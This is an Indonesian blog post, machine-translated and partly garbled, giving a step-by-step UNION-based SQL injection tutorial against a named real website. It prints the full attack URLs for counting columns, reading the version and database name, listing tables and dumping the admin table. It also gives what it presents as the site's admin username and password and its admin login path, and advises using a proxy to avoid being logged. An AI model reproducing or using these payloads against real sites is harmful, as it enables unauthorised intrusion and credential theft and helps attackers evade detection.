Warung Bebas

Monday, June 4, 2012

Basic Sql Injection dan video


BASIC SQL INJECTION DAN VIDEO











   















Halo Penjelajah Keamanan, Selamat Datang di Keamanan dieksplorasi. Apakah Hari ini saya akan mengajarkan dasar sql injection dengan demo hidup. Seperti yang Anda telah mendengar tentang sql injection .. Cara sering digunakan untuk menyerang keamanan situs Web adalah laporan masukan SQL dalam bentuk web untuk mendapatkan website yang didesain dengan buruk untuk dump isi database ke penyerang - sebuah injeksi SQL. Ini adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan dalam perangkat lunak sebuah website. Kerentanan terjadi ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan tak terduga dieksekusi. Perintah SQL demikian disuntikkan dari bentuk web ke database dari sebuah aplikasi (seperti query) untuk mengubah isi database atau membuang informasi database seperti kartu kredit atau password untuk penyerang. SQL injection banyak dikenal sebagai vektor serangan untuk website tetapi dapat digunakan untuk menyerang semua jenis database SQL. Sekarang mari kita mulai, Saya memiliki situs rentan sql dengan saya.

http://www.leadacidbatteryinfo.org/newsdetail.php?id=44




Aku punya situs ini dari Google menggunakan google dorks.I harap Anda tahu bagaimana untuk menemukan situs yang rentan sql. Jika tidak maka beritahu saya melalui komentar atau mail. Sekarang bergerak maju, Mari kita memeriksa kerentanan, menggunakan "'" tanda apostrof. Sekarang url kita akan terlihat seperti http://www.leadacidbatteryinfo.org/newsdetail.php?id=44 'Urungkan pengeditan









Setelah itu kita punya kesalahan Sql "Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan versi MySQL server Anda untuk sintaks yang benar untuk menggunakan dekat '\'' pada baris 1" Menampilkan bahwa situs ini rentan terhadap injeksi Sql. sekarang hal berikutnya yang harus dilakukan adalah menemukan jumlah kolom. Untuk ini, http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+1--



Seperti kita memuat url ini kita tidak mendapatkan kesalahan tetapi halaman yang normal. Hal ini menunjukkan bahwa ada minimal 1 kolom dalam database. Sekarang untuk Memeriksa keabsahan kolom 2 http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+2--Urungkan pengeditan




lagi kita punya kesalahan dan halaman normal, ini menunjukkan bahwa kolom 2 tersedia dalam database dan ada minimal 2 kolom dalam database. Demikian pula untuk memeriksa 3,4,5,6,7,8,9,10,11 kolom url akan, http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+3-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+4-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+5-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+6-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+7-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+8-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+9-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+10-- http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+11-- Sekarang sampai 11 kolom kita punya tidak ada kesalahan berarti ada minimal 11 kolom dalam database. Sekarang jika kita memeriksa kolom 12, http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+order+by+12--


kita pergi kesalahan ini "'12 kolom Diketahui 'dalam' klausul agar" Hal ini menunjukkan bahwa tidak ada kolom 12 dalam database atau hanya ada 11 kolom dalam database. Ok berikutnya Langkah Kami punya jumlah kolom dalam database, sekarang kita perlu mencari kolom rentan, kolom di mana kita akan menyuntikkan dan ekstrak data. Untuk melakukan itu kita akan menggunakan "Uni pilih semua" The "order by", "serikat semua pilih" dan banyak lagi, semua perintah MySQL. Jika Anda ingin mempelajari pengetahuan sebenarnya di balik injeksi sql, Anda perlu belajar tentang-MY SQL. Sekarang untuk menemukan kolom rentan Url akan, http://www.leadacidbatteryinfo.org/newsdetail.php?id=44+union+all+select+1,2,3,4,5,6,7,8,9,10,11 -Urungkan pengeditan


Dengan memasukkan url ini ke address bar dan loading kita akan mendapatkan nomor di suatu tempat pada halaman Web. Dalam hal ini, Lihat di sisi bawah halaman web Anda akan melihat beberapa angka. Dalam beberapa kasus Anda tidak mendapatkan nomor memasuki url ini. Untuk itu kasus Anda telah menambahkan sebuah "-" tanda di url di tempat yang ditunjukkan di bawah ini http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44+union+all+select+1,2,3,4,5,6,7,8,9,10,11 -


Seperti yang Anda lihat saya telah menambahkan tanda minus sebelum nomor 44. Dengan ini saya akan mendapatkan nomor pada halaman Web. Ok di sini kita punya 8, 3, 4, 5 pada halaman Web. Ini berarti kolom 8,3,4,5 rentan, berarti kita bisa menyuntikan di salah satu 4 kolom - 8,3,4,5. Saya akan menyuntikkan dalam kolom 3. Sekarang kita perlu menemukan versi database MySQL. Untuk ini kita harus mengganti salah satu kolom rentan dengan "vsersion ()" atau "@ @ version" Sekarang url kita akanUrungkan pengeditan


Seperti yang kita lihat bukan 3 kita mendapatkan 5.1.52. Ini berarti versi database MySQL adalah 5.1.52. Anda juga bisa mendapatkan nama database saat ini dengan mengganti salah satu kolom rentan dengan "database ()" atau "@ @ database". Untuk mendapatkan nama database saat ini,Urungkan pengeditan


Demikian pula nama database kami saat ini adalah "32908_leadacidbatteryinfoorg" Nama database saat ini membantu ketika ada lebih dari 2 database situs tersebut. Sekarang selanjutnya kita perlu mencari nama tabel. Meja elemen dalam database di kolom mana yang disimpan dan, dalam kolom informasi (data) disimpan. Untuk menemukan nama tabel, Anda harus menggunakan GROUP_CONCAT. + table_schema = database () -Urungkan pengeditan







Sekarang di sini Anda melihat semua nama tabel yang disimpan dalam database. Kami punya tabel thses Sekarang ini tergantung pada Anda bahwa jenis data yang ingin Karena saya memerlukan informasi administrator, saya akan memilih meja - tbladmin Demikian pula untuk menemukan nama kolom, + table_schema = database () -




Kita punya kolom ini
_num,c_url,c_val,c_time,spider_id,key_id,weight,ex_id,ex_site_id,ex_path,in_id,in_site_id,in_path,key_id,twoletters,keyword,l_id,l_includes,l_excludes,l_num,l_mode,l_ts,l_time,site_id,days,links,depth,site_id,site_url,upddate,username,password,port,locked,stopped,spider_id,file,first_words,upddate,md5,site_id,path,num_words,last_modified,
The columns “username “ and “password” are from the table “tbladmin”Misalkan saya perlu untuk mendapatkan data yang disimpan dalam dua kolom, berarti saya akan membuang dua kolom.Jadi sintaks kita akan,menjadi ini :http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44+union+all+select+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+tbladmin--



yang "0x3a" antara dua kolom hanya menempatkan ":", usus besar tanda sehingga Anda dapat dengan mudah membedakan nama pengguna betwwen dan password. Di sini kita mendapatkan informasi admin, Username: ishir Password: ishir123 Jika Anda perlu untuk mendapatkan data selain username dan password, sehingga Anda harus memilih nama kolom dan nama tabel. seperti, http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44+union+all+select+1, 2, GROUP_CONCAT (KOLOM NAMA TERPISAH DENGAN MASUK ","), 4,5,6,7,8 , 9,10,11 + dari NAMA TABLE + - Sekarang Anda memiliki username dan password admin, sehingga hal berikutnya yang Anda perlu mencari halaman admin mana Anda dapat login dengan data ini, Anda dapat menggunakan "HAVIJ" untuk menemukan halaman login admin. Jika Anda tidak tahu bagaimana melakukan ini kemudian menghubungi saya. Di sini, di halaman admin kasus dari situs ini, http://www.leadacidbatteryinfo.org/admin/~~V



\





Catatan t - Jika situs memiliki versi database MySQL kurang dari 5 maka Anda perlu menebak table dan nama kolom melompat ke langkah dumping. Jangan lupa untuk menggunakan proxy saat login yang lain ip anda akan disimpan dalam database situs ini.





SALAM NEWBITOL L&A (B-COMPI AND X-CODE
THANKS TO KANG JIBRIL DOEL,LEPHEX ,FARID,AND SAUDARA2 B-COMPI









































0 comments em “Basic Sql Injection dan video”

Post a Comment

 

Indahnya Berbagi Copyright © 2012 Fast Loading -- Powered by Blogger